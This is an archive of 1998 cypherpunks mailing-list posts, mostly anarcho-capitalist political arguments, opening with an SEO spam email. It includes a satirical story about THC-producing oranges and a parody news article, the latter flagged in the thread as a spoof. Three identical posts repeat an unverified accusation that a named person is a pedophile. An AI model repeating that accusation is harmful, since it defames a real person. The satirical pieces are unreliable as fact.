My name is Stephen Mahaney. I am the president of Planet
Ocean Communications. My web marketing company has literally
"written the book" on how to position your website on the
front page -- the Top Ten -- of each of the major search
engines... and we guarantee your satisfaction!

The "UnFair Advantage Book on Winning the Search Engine Wars" is
an 85 page manual that identifies every known trick & technique
being used on the Internet to gain top search engine positioning
-- right where you need to be so that potential customers who are
seeking your services or products can find you.

Our monthly "Search Engine Wars Update Newsletter" keeps you
informed of the latest techniques and frequent changes that take
place in the dynamic world of "search engine" positioning.

However, understanding the process does not require a degree
in "rocket" science -- nor do you need to be "technically
oriented". Whether your website is a "do-it-yourself"
project or you are paying someone to maintain your site, you
(or your webmaster) need to know the tricks in this book in
order to compete with the professionals who are dominating
the front pages of the various search categories.

To learn more about how you can obtain this essential
information and receive a free subscription to our
monthly update Newsletter, go to....

  http://www.search-engine-secrets.com/se_help/

Sincerely, 
Stephen Mahaney - President 
Planet Ocean Communications


***************************************************
Note: We have contacted you based on information that we
gathered while visiting your website - If you would prefer
not to receive mail from us in the future, simply reply with
the word "remove" in the subject line and you will be
automatically excluded from future correspondence. 
***************************************************
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Wed, 11 Nov 1998 03:17:09 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the (fwd)
In-Reply-To: <199811101638.KAA18839@einstein.ssz.com>
Message-ID: <v04011716b26e1c5f0b8f@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:38 AM -0500 11/10/98, Jim Choate wrote:
>Forwarded message:
>
>> Date: Wed, 11 Nov 1998 01:25:02 +1000
>> From: Reeza! <howree@cable.navy.mil>
>> Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the
>>   Foregone (fwd)
>
>> I think there may be a finer distiction- it lies in corruption of the
>> enforcing body.
>
>Your right, let me spell it out. Free-markets as depicted by
>anarcho-whatever theories legitimize theft, physical violence, extortion,
>etc. They further a priori abandon any precept of social institution and

	Theft, violence and extortion are already legitimate, not only does
the government use them all the time, but corporations and indivuduals do
as well.

>leave it all on the shoulder of the individuals. Additionaly they abandon
>such concepts of justice, equity, etc. because they describe no mechanism

	There is no (or little) justice under the current system. When was
the last time a cop went to jail for a murder that he/she committed while
on duty. Is OJ behind bars?

	We have courts of Law, Justice is ashamed to show her face.

>to handle these issues. And finaly, they don't even attempt to recognize
>the international interactions and cultural differences that drive them.

	We recognize that these interactions exist, but guess what, for any
sort  of anarchy to exist, it has to happen globally. We are as concerned
about the people on the other side of the planet as we are about the people
in the next city over. Just not much.

>They make the same mistake as every other form of non-democratic system,
>they assume because it works for one it works for all.

	No, we assume the opposite, that nothing works for large numbers of
people, and everyone should be free to find their own level.

>> This is the same sort of tactic imho as the war on drugs(tm). Big show,
>> little enforcement, extract money from the money holders. Money exchanges =
>> leniency.
>
>Not even hardly. At least citizens can change the laws under a democracy.
>Under an anarcho-whatever it is strictly lump it or like it unless you're
>willing to fund a bigger gun.

	Riiiighhht. Tell that to Californians who decided that Marjuana
should be part of Doctors tool kit, and the Feds said "prescribe it and
loose your lisence to prescribe".

>> Aside from the comment on honesty, the rest of this reply is sophistry.
>> Petro was asserting a point, which Jim acknowledged, then procedes to
>> assassinate with particulars of questionable relevance. In a true anarchy,
>> who is to say that trade in human lives and stolen property must be stopped
>> in that "true free market"???
>I'm going to stop now, this particular vein of discussion is bereft of any
>and all positive attributes when one tries to justify slavery and theft.

	He was just taking into account different cultural differences.
Some cultures don't have a problem with slavery.

	Personally, given a lack of law enforcement, I'd shoot the
bastards, but then I never claimed to be tolerant of other peoples
cultures.
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 11 Nov 1998 05:21:30 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: NPR is at it again...
In-Reply-To: <v04020a2ab26e42c57116@[139.167.130.247]>
Message-ID: <199811102041.MAA14945@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




>Some commie law professor broad :-) is talking about how there oughtta be a
>law against anonymous remailers, deja news, and various forms of "illegal"
>email...
>The ganglia twitch...

like hotmail and yahoo mail??? these are *awesome* remailers. I picked
up a yahoo mail account recently and am blown away with all the *FEATURES*!!
separate folders, filtering, external mailboxes support through POP,
binary attachments, my gosh!!!!! my cup runneth over, for free, TOTALLY
ANONYMOUS   check it out cpunks, a cpunk wet dream!!

trust me on this one, it's not going away. it's a LUCRATIVE
business worth millions a year.

there was a recent conference under a year ago (or more, maybe I can't
remember) by the AAAS (am. assoc. adv. science) on anonymity with
academics/papers/talks and everything. did anyone check that out?
do they have a web page???

and stop twitching your ganglia, it's really creepy!!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Wed, 11 Nov 1998 08:08:59 +0800
To: Cypherpunks@cyberpass.net
Subject: Off Topic But Truly Beautiful (fwd )
In-Reply-To: <3648A1A9.7DE1@lsil.com>
Message-ID: <3648ABF9.515D@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



Clyde wrote:
> 
> Long but fascinating...
> 
>     ---------------------------------------------------------------
> 
>     9 November 1998
> 
>     DATELINE--Tallahassee, Fla.
>     Oranges that get you high
>     ===========================
> 
>     A Florida Biochemist designs a citrus tree with THC.
> 
>     In the summer of 1984, 10th-grader Irwin Nanofsky and a
>     friend were driving down the Apalachee Parkway on the way
>     home from baseball practice when they were pulled over by
>     a police officer for a minor traffic infraction.
> 
>     After Nanofsky produced his driver's license the police
>     officer asked permission to search the vehicle. In less
>     than two minutes, the officer found a homemade pipe
>     underneath the passenger's seat of the Ford Aerostar
>     belonging to the teenage driver's parents. The minivan
>     was seized, and the two youths were taken into custody on
>     suspicion of drug possession.
> 
>     Illegal possession of drug paraphernalia ranks second
>     only to open container violations on the crime blotter of
>     this Florida college town. And yet the routine arrest of
>     16 year-old Nanofsky and the seizure of his family's
>     minivan would inspire one of the most controversial
>     drug-related scientific discoveries of the century.
> 
>     Meet Hugo Nanofsky, biochemist, Florida State University
>     tenured professor, and the parental authority who posted
>     bail for Irwin Nanofsky the night of July 8, 1984. The
>     elder Nanofsky wasn't pleased that his son had been
>     arrested for possession of drug paraphernalia, and he
>     became livid when Tallahassee police informed him that
>     the Aerostar minivan would be permanently remanded to
>     police custody.
> 
>     Over the course of the next three weeks, Nanofsky penned
>     dozens of irate letters to the local police chief, the
>     Tallahassee City Council, the State District Attorney
>     and, finally, even to area newspapers. But it was all to
>     no avail.
> 
>     Under advisement of the family lawyer, Irwin Nanofsky
>     pled guilty to possession of drug paraphernalia in order
>     to receive a suspended sentence and have his juvenile
>     court record sealed. But in doing so, the family minivan
>     became "an accessory to the crime." According to Florida
>     State law, it also became the property of the Tallahassee
>     Police Department Drug Task Force. In time, the adult
>     Nanofsky would learn that there was nothing he could do
>     legally to wrest the vehicle from the hands of the state.
> 
>     It was in the fall of 1984 that         Biochem 101: How to
>     John Chapman Professor of               design a
>     Biochemistry at Florida State           Cannabis-equivalent
>     University, now driving to work         citrus plant
>     behind the wheel of a used Pontiac
>     Bonneville, first set on a pet          Step One:
>     project that he hoped would             Biochemically
>     "dissolve irrational legislation        isolate all the
>     with a solid dose of reason."           required enzymes for
>     Nanofsky knew he would never get        the production of
>     his family's car back, but he had       THC.
>     plans to make sure that no one
>     else would be pulled through the        Step Two:
>     gears of what he considers a            Perform N-terminal
>     Kafka-esque drug enforcement            sequencing on
>     bureaucracy.                            isolated enzymes,
>                                             design degenerate
>     "It's quite simple, really,"            PCR (polymerase
>     Nanofsky explains, "I wanted to         chain reaction)
>     combine Citrus sinesis with Delta       primers and amplify
>     9-tetrahydrocannabinol." In             the genes.
>     layman's terms, the respected
>     college professor proposed to grow      Step Three:
>     oranges that would contain THC,         Clone genes into an
>     the active ingredient in                agrobacterial vector
>     marijuana. Fourteen years later,        by introducing the
>     that project is complete, and           desired piece of DNA
>     Nanofsky has succeeded where his        into a plasmid containing
>     letter writing campaign of yore         a transfer or T-DNA.
>     failed: he has the undivided            The mixture is transformed
>     attention of the nation's top drug      into Agrobacterium
>     enforcement agencies, political         tumefaciens, a gram
>     figures, and media outlets.             negative bacterium.
> 
>     The turning point in the Nanofsky       Step Four:
>     saga came when the straight-laced       Use the Agrobacterium
>     professor posted a message to           tumefaciens to infect citrus
>     Internet newsgroups announcing          plants after wounding. The
>     that he was offering                    transfer DNA will proceed
>     "cannabis-equivalent orange tree        to host cells by a mechanism
>     seeds" at no cost via the U.S.          similar to conjugation.
>     mail. Several weeks later, U.S.         The DNA is randomly
>     Justice Department officials            integrated into the
>     showed up at the mailing address        host genome and will
>     used in the Internet announcement:      be inherited.
>     a tiny office on the second floor
>     of the Dittmer Laboratory of
>     Chemistry building on the FSU campus. There they would wait
>     for another 40 minutes before Prof. Nanofsky finished
>     delivering a lecture to graduate students on his recent
>     research into the "cis-trans photoisomerization of olefins."
> 
>     "I knew it was only a matter of time before someone sent
>     me more than just a self-addressed stamped envelope,"
>     Nanofsky quips, "but I was surprised to see Janet Reno's
>     special assistant at my door." After a series of closed
>     door discussions, Nanofsky agreed to cease distribution
>     of the THC-orange seeds until the legal status of the
>     possibly narcotic plant species is established.
> 
>     Much to the chagrin of authorities, the effort to
>     regulate Nanofsky's invention may be too little too late.
>     Several hundred packets containing 40 to 50 seeds each
>     have already been sent to those who've requested them,
>     and Nanofsky is not obliged to produce his mailing
>     records. Under current law, no crime has been committed
>     and it is unlikely that charges will be brought against
>     the fruit's inventor.
> 
>     Now it is federal authorities who must confront the
>     nation's unwieldy body of inconsistent drug laws.
>     According to a source at the Drug Enforcement Agency, it
>     may be months if not years before all the issues involved
>     are sorted out, leaving a gaping hole in U.S. drug policy
>     in the meantime. At the heart of the confusion is the
>     fact that THC now naturally occurs in a new species of
>     citrus fruit.
> 
>     As policy analysts and hemp advocates alike have been
>     quick to point out, the apparent legality (for now) of
>     Nanofsky's "pot orange" may render debates over the
>     legalization of marijuana moot. In fact, Florida's top
>     law enforcement officials admit that even if the
>     cultivation of Nanofsky's orange were to be outlawed, it
>     would be exceedingly difficult to identify the presence
>     of outlawed fruit among the state's largest agricultural
>     crop.
> 
>     Amidst all of the hubbub surrounding his father's
>     experiment, Irwin Nanofsky exudes calm indifference. Now
>     30-years-old and a successful environmental photographer,
>     the younger Nanofsky can't understand what all of the
>     fuss is about. "My dad's a chemist. He makes polymers. I
>     doubt it ever crossed his mind that as a result of his
>     work tomorrow's kids will be able to get high off of half
>     an orange."
> 
>     Copyright 1994-98 San Francisco Bay Guardian.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 11 Nov 1998 06:09:58 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Clinton Wants Loophole In U.S. Free Speech Closed
Message-ID: <199811102122.NAA18762@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: oldbat <bucsplace@cchat.com>
Subject: IP: Clinton Wants Loophole In U.S. Free Speech Closed
Date: Tue, 10 Nov 1998 12:48:25 -0500
To: IP <ignition-point@majordomo.pobox.com>

http://dailynews.yahoo.com/headlines/ts/story.html?s=v/nm/19981107/ts/guns_3.html
 
> WASHINGTON (Reuters) - President Clinton directed his government Saturday to
> find a way to close a legal loophole that allows speakers/journalists to
> express their ideas at public places with no questions asked.
> In his weekly radio address, Clinton said a ``dangerous trend'' is emerging
> at seminars and radio talk shows because the First Amendment permits people
> to express their ideas without background checks.
> ``Some of these talk shows have become a heaven for criminals and hate
> speech mongers looking to sway people on a no-questions-asked basis,''
> Clinton said.
> He directed Treasury Secretary Robert Rubin and Attorney General Janet Reno
> to report back to him in 60 days with a plan to close the loophole in the
> Bill of Rights and to prohibit any free speech without a background check.
> ``I believe this should be the law of the land: No background check, no free
> speech, no exceptions,'' Clinton said.
> In a fact sheet, the White House said that every week about 35 million
> people regularly listen to an estimated 50 conservative radio personalities
> such as Rush Limbaugh and G. Gordon Liddy.
> On Nov. 30, 1999 the FBI's National Instant Criminal Background Check System
> is set to take effect to allow quicker checks and approve speech licenses
> sales within minutes.
> In addition, on Nov. 30, 1999 the law will be strengthened in two ways:
> purchases of all speech licenses, not just political, will be subject to
> Reno background checks as will Kinko's printing services, which are four
> times as likely to involve a prohibited printed opinions.
> Overall, the White House said, it is estimated that the number of background
> checks conducted nationally will increase from 0 million to between 10 and
> 12 million.
> Unregulated speech are ``an open invitation to criminals and right wing
> crazies,'' said Janet Reno, who chairs SpeechControl Inc. The Clinton law
> was named after the President, who was wounded in verbal attacks first
> launched by radio personality Rush Limbaugh in 1992.
> California and Maryland regulate ``hate speech'', said Reno. Florida voters
> passed a constitutional amendment Tuesday giving counties the power to
> require a waiting period and a background check for speech at public places.



****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 11 Nov 1998 06:08:03 +0800
To: cypherpunks@cyberpass.net
Subject: IPINFO: Re: IP: Clinton Wants Loophole In U.S. Free Speech Closed
Message-ID: <199811102122.NAA18772@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IPINFO: Re: IP: Clinton Wants Loophole In U.S. Free Speech Closed
Date: Tue, 10 Nov 1998 13:08:39 -0600
To: oldbat <bucsplace@cchat.com>, ignition-point@majordomo.pobox.com

NOTICE TO LISTEES:

If you are forwarding materials to the IP list that include URLs, *PLEASE*
check them for accuracy before posting.

Regarding:
--------------------------
>>Subject: IP: Clinton Wants Loophole In U.S. Free Speech Closed
>>http://dailynews.yahoo.com/headlines/ts/story.html?s=v/nm/19981107/ts/guns
_3.html
>>
>> WASHINGTON (Reuters) - President Clinton directed his government
Saturday to
>> find a way to close a legal loophole that allows speakers/journalists to
>> express their ideas at public places with no questions asked.
--------------------------

The above "story" is either a spoof of satire, or else an incorrect URL was
given to accompany the article.  If you access the link above you DO NOT
find a story about free speech, but rather, the material below.  If
materials you send are not factual but are humorous or satirical in nature,
please note that for the readers so we don't have a bunch of unfounded
rumors floating around about new draconian measures that were actually only
jokes to begin with.  If there is a real story about Clinton's opposition
to free speech, someone please send the correct URL.  Here is the REAL
story that accompanies the link above:

Saturday November 7 12:46 PM ET 

Clinton Wants Loophole In U.S. Gun Law Closed

WASHINGTON (Reuters) - President Clinton directed his government Saturday
to find a way to close a legal loophole that allows dealers to sell guns at
gun shows with no questions asked.

In his weekly radio address, Clinton said a ``dangerous trend'' is emerging
at gun shows because the Brady handgun control law permits some firearms to
be sold without background checks at these shows.

``Some of these gun shows have become illegal arms bazaars for criminals
and gun traffickers looking to buy and sell guns on a cash-and-carry,
no-questions-asked basis,'' Clinton said. 

He directed Treasury Secretary Robert Rubin and Attorney General Janet Reno
to report back to him in 60 days with a plan to close the loophole and
prohibit any gun sale without a background check.

``I believe this should be the law of the land: No background check, no
gun, no exceptions,'' Clinton said.

In a fact sheet, the White House said that every year about 5 million
people attend an estimated 5,000 gun shows at convention centers, school
gyms and on fairgrounds.

The Brady law requires a five-day waiting period for gun purchasers in
order for a background check. On Nov. 30, the FBI's National Instant
Criminal Background Check System is set to take effect to allow quicker
checks and approve gun sales within minutes.

In addition, on Nov. 30 the law will be strengthened in two ways: purchases
of all firearms, not just handguns, will be subject to Brady background
checks as will pawnshop redemptions, which are four times as likely to
involve a prohibited purchase.

Overall, the White House said, it is estimated that the number of
background checks conducted nationally will increase from 4 million to
between 10 and 12 million.

Unregulated sales at gun shows were ``an open invitation to criminals,''
said Sarah Brady, who chairs Handgun Control Inc. The Brady law was named
after her husband, James Brady, who was wounded in an attack on President
Ronald Reagan in 1981.

California and Maryland regulate ``flea market'' gun sales, said Brady.
Florida voters passed a constitutional amendment Tuesday giving counties
the power to require a waiting period and a background check for sales at
gun shows and other public places. 

  Copyright (c) 1998 Reuters Limited. 
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Frank O'Dwyer" <fod@brd.ie>
Date: Tue, 10 Nov 1998 22:14:18 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: fuck copyright (Re: Advertising Creepiness) (fwd)
In-Reply-To: <199811100539.XAA16120@einstein.ssz.com>
Message-ID: <36483E87.E735E257@brd.ie>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
> > You can make money from information provision by charging extra for
> > up-to-date news, or by charging so little that the cost from the
> > original provider is so low that it's not worth anyones time to
> > redistribute it,
> 
> That's true now, why don't we see these effects...

We do. News inherently has a 'sell-by' date. The most obvious example is
stock quotes where delayed quotes are provided for free whereas
real-time quotes are heavily charged for. The recipients of such
information care very much about latency, since it's possible to trade
on any differences that may exist. There's even some research on attacks
that simply delay packets in such networks.

Cheers,
Frank O'Dwyer.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes <jvb@ssds.com>
Date: Wed, 11 Nov 1998 04:06:08 +0800
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: charity at the point of a gun (Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone) (fwd)
In-Reply-To: <199811100027.AAA07402@server.eternity.org>
Message-ID: <Pine.LNX.3.96.981110131742.408A-100000@mothra.fastrans.com>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 10 Nov 1998, Adam Back wrote:

> 
> Christopher Petro writes:
> > 	In other words Jim, Fuck You. I, and I'd bet most people here,

Don't split hairs, Petro.  Tell us what you really think. ;-)

> > including Mr. May, are perfectly willing, and hell even eager to pay their
> > share, to assume their social responcibility, they just get very, very
> > angry at having to pay OTHER peoples social responcibility, and get very,
> > very angry at having to pay for other shit (Senate Luncheons and Swimming
> > Pools, the Militaries greatly inflated budget, all the waste that is todays
> > federal government).
> 
> What is annoying is "charity" (social security) at the point of a gun.
> Our "conscience" is being decided by government which is acting as a
> broker for those lobby for their "need" and for your assets to be
> stolen and redistributed to them.
> 

(1) Social transfer payments at the point of a gun are involuntary
compassion.

(2) Involutary compassion is usually called rape.  You are forcing
me to "love" some other person.  To adopt them not only as a proxy
family member, but as one that cannot be "cutoff" if they waste
my charity.  Of course I must not only pay for them, but I must
pay for the bureaucrat that manages this family member.

Combine this with the US Govt defining a sex life as a "right"
(witness free Viagra) and you come up with some pretty 
chilling scenarios.

(do people have the "right" to a sex partner?)

Apparently involuntary compassion at gunpoint is not beyond
justification by the US fed govt and the propagandized sheeple.

Whats to stop rape of selected human beings by agents of
the federal government?  (ok, maybe thats going a little
too far

Rape by proxy, thats the federal government for you.

jim








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Wed, 11 Nov 1998 07:26:37 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Off Topic But Truly Beautiful
Message-ID: <3648B332.19DA@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



I didn't think of this before but add together bees, wind and rampant
tree sex and this stuff will definitely spread. It could even become a
bit of a "problem".

The people who have packets of seeds should distribute those quickly to
friends before the buggerers get the mailing list and start confiscating
seeds.

BTW - I believe that citrus hybridize freely, rather like mentha in that
respect.

Wild and cool. I think he should do apples next. Then strawberries.
Peaches. Beans. A whole fucking farmer's market.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 11 Nov 1998 04:06:10 +0800
To: cypherpunks@cyberpass.net
Subject: NPR is at it again...
Message-ID: <v04020a2ab26e42c57116@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain



Some commie law professor broad :-) is talking about how there oughtta be a
law against anonymous remailers, deja news, and various forms of "illegal"
email...

The ganglia twitch...

Cheers,
Bob Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pramote J." <pramotej@thai.com>
Date: Tue, 10 Nov 1998 17:28:29 +0800
To: fight-censorship@vorlon.mit.edu
Subject: Re: Child-Molesting Forger's Chilling Confession!!!1!
Message-ID: <199811100850.PAA04184@ratree.psu.ac.th>
MIME-Version: 1.0
Content-Type: text/plain



Encrypted_Message=On 4 May 1998 02:57:07 GMT, in article <6ijaq3$bb1@news1.panix.com>,
<The@NSA.sucks> Information Security (= Guy Polis <guy@panix.com>) wrote:
#   Guy Polis (guy@panix.com, eviljay@bway.net) is a pedophile child
#   molester who was fired from his consulting position at Salomon Brothers
#   after he was caught masturbating in his cubicle at the child pornography
#   JPEGs that he downloaded from the Internet.

The poster's been awful quiet lately - did the feds arrest him?
Browser=Netscape:Mozilla/3.04Gold (Win95; I)
Remedy=Tell the world




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pramote J." <pramotej@thai.com>
Date: Tue, 10 Nov 1998 17:25:36 +0800
To: fight-censorship@vorlon.mit.edu
Subject: Re: Child-Molesting Forger's Chilling Confession!!!1!
Message-ID: <199811100851.PAA04207@ratree.psu.ac.th>
MIME-Version: 1.0
Content-Type: text/plain



Encrypted_Message=On 4 May 1998 02:57:07 GMT, in article <6ijaq3$bb1@news1.panix.com>,
<The@NSA.sucks> Information Security (= Guy Polis <guy@panix.com>) wrote:
#   Guy Polis (guy@panix.com, eviljay@bway.net) is a pedophile child
#   molester who was fired from his consulting position at Salomon Brothers
#   after he was caught masturbating in his cubicle at the child pornography
#   JPEGs that he downloaded from the Internet.

The poster's been awful quiet lately - did the feds arrest him?
Browser=Netscape:Mozilla/3.04Gold (Win95; I)
Remedy=Tell the world




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pramote J." <pramotej@thai.com>
Date: Tue, 10 Nov 1998 17:34:24 +0800
To: fight-censorship@vorlon.mit.edu
Subject: Re: Child-Molesting Forger's Chilling Confession!!!1!
Message-ID: <199811100851.PAA04223@ratree.psu.ac.th>
MIME-Version: 1.0
Content-Type: text/plain



Encrypted_Message=On 4 May 1998 02:57:07 GMT, in article <6ijaq3$bb1@news1.panix.com>,
<The@NSA.sucks> Information Security (= Guy Polis <guy@panix.com>) wrote:
#   Guy Polis (guy@panix.com, eviljay@bway.net) is a pedophile child
#   molester who was fired from his consulting position at Salomon Brothers
#   after he was caught masturbating in his cubicle at the child pornography
#   JPEGs that he downloaded from the Internet.

The poster's been awful quiet lately - did the feds arrest him?
Browser=Netscape:Mozilla/3.04Gold (Win95; I)
Remedy=Tell the world




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Hohensee <mah248@nyu.edu>
Date: Wed, 11 Nov 1998 08:01:55 +0800
To: "Albert P. Franco, II" <cypherpunks@cyberpass.net
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone(fwd)
In-Reply-To: <5F152E6E8E6FD21195DF00104B2425AD02B276@yarrowbay.chaffeyhomes.com>
Message-ID: <3648A8A0.46A41EFC@nyu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Albert P. Franco, II wrote:
> 
> I've been lurking on this thread for a while, and I am amazed by the level
> of utopist muck that is being spewed here by you.

I love you, too.

> Without some government the Bad Guys will be the only ones with anything.
> It is only with the threat of losing their power that leaders do good. If
> they had no power which could be lost or taken they will always do what's
> best for them in the short term, which is usually to shit on the peons.
> Dictators (like Pinochet and Gates) do their dirty deeds because they feel
> no need to placate the masses.

If they wield no real power, and proceed to do whatever is best for them
in the short term, they will be screwing themselves over in the long
term (or short term, if doing what they want results in someone shooting
them in self defense).

And precisely what dirty deeds has Mr. Gates ever done?  Excluding those
actions in which the judicious use of state regulation was involved.

> This anarcho-capitalist spew is so much crap that the bullshit indicators
> are blaring at top volume. If the people can't control a constitutional
> government, known for having peacefully free elections for over two hundred
> years, then how the hell do think you can convince somebody that the people
> are going to be able to control warlords and monopolies. It's called, "You
> don't like it? Bang, Bang, you're dead!"

Yah, and then somebody else points a gun at Mr. would-be warlord and
goes Bang, Bang, he's dead  (it's unsafe having warlords about --sorta
like scorpions).  That is, if Mr. would-be manages to shoot me without
being shot himself.

> Try to lift yourself out of the bullshit of your theory and give us at
> least one REAL example (current or historic) of a large scale, long lasting
> anarcho-capitalist society. Hippie communes are too small, and make sure
> it's capitalistic. If you can't think of one in the next year or so then
> come back and tell us.

It hasn't happened yet.  But then, neither had the USA, before 1776. 
The above is not a reasonable argument.

You can, of course, as me how it *could* happen.  And unfortunately,
you're partially correct, it couldn't happen under current conditions. 
The amount of personal firepower that is easily accessible by everyone
is not sufficient to back up the soverignity of each individual.  It's
all linked to whether weapons technology is such that individuals can
operate weapons which are just as effective as those wielded by highly
trained and specialized groups.  The pendulum of weapons tech. swings
back and forth over time.  During the American Revolution, the pendulum
was on the side of individuals, as can be shown by the fact that the
revolutionaries were carrying better weapons than those carried by
professional soldiers, and could use them to equal or larger effect.

Today, of course, the pendulum is on the other side.  Tanks, fighter
planes, aircraft carriers, etc are where it's at.  Read "Weapons Systems
and Political Stability" by Carroll Quigley, for an interesting analysis
on the subject.  

Of course, the pendulum keeps on swinging, and there are some
indications that it's moving back.  For example, anti-aircraft missiles
have gotten so small that they can be carried by one man.  In any modern
war, planes had better be damned careful of what they fly over, lest
they get a missile up their rears.

So, all we need right now is to produce either a convienient
impenetrable shield, or perhaps high-energy weapons.  When one man can
take out a tank with an inexpensive handweapon, we'll be all set. :)

Michael Hohensee




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Hohensee <mah248@nyu.edu>
Date: Wed, 11 Nov 1998 05:27:16 +0800
To: cypherpunks@cyberpass.net
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone(fwd)
In-Reply-To: <199811101334.HAA17420@einstein.ssz.com>
Message-ID: <3648AA84.55E32DEB@nyu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:
>  
> Explain how the system works. Explain how the various systems operate, how
> the costs are calculated, and how they're paid. I want to see the same level
> of *specificity* that I and others have agreed to provide you in our
> examples.

Do you have any idea what you're asking for?

Quite frankly, I do not have the time (nor the space) to explain to you,
in detail, how an entire civilization operates.  In fact, any attempt by
me to explain such a system would fail, since there are doubtless many
innovations which specialists in the respective fields would make, and
there are many more which have already been made, which I am not
necessarilly aware of.

I have already offered you explainations of how some systems might
operate --the fire dept./insurance company situation, for example.  That
was in the sections you snipped for not answering "any questions that
have been posed".  I suggest you go back and read them, if you missed it
the first time.

I can, however, direct you to a book which deals with the subject in
some detail.  It's called "The Market for Liberty", by an author who's
name eludes me at the moment.  If you're really interested in the
answers to your above questions, I suggest you go read it.  If you need
the name of the author to find it, I'm sure I can look it up for you and
give it to you within a day or so.

> We want an answer not some glib off the shoulder quip.

As I said, read the part of my previous post that you didn't bother to
address.

> [I'm deleting the rest of this since it doesn't answer any questions that
> have been posed to the anarcho-whatever side]
> 

Then you haven't been reading very closely.

Michael Hohensee




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Wed, 11 Nov 1998 06:57:16 +0800
To: Michael Hohensee <cypherpunks@cyberpass.net
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and theForegone(fwd)
In-Reply-To: <199811101334.HAA17420@einstein.ssz.com>
Message-ID: <v0401171bb26e5f36bdf9@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 4:05 PM -0500 11/10/98, Michael Hohensee wrote:
>Jim Choate wrote:
>> [I'm deleting the rest of this since it doesn't answer any questions that
>> have been posed to the anarcho-whatever side]
>Then you haven't been reading very closely.

	That has already been established.
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Hohensee <mah248@nyu.edu>
Date: Wed, 11 Nov 1998 06:02:59 +0800
To: cypherpunks@cyberpass.net
Subject: Re: How to solve the tax problem w/o anarchy or force (fwd)
In-Reply-To: <199811101323.HAA17131@einstein.ssz.com>
Message-ID: <3648B194.AB83423C@nyu.edu>
MIME-Version: 1.0
Content-Type: text/plain



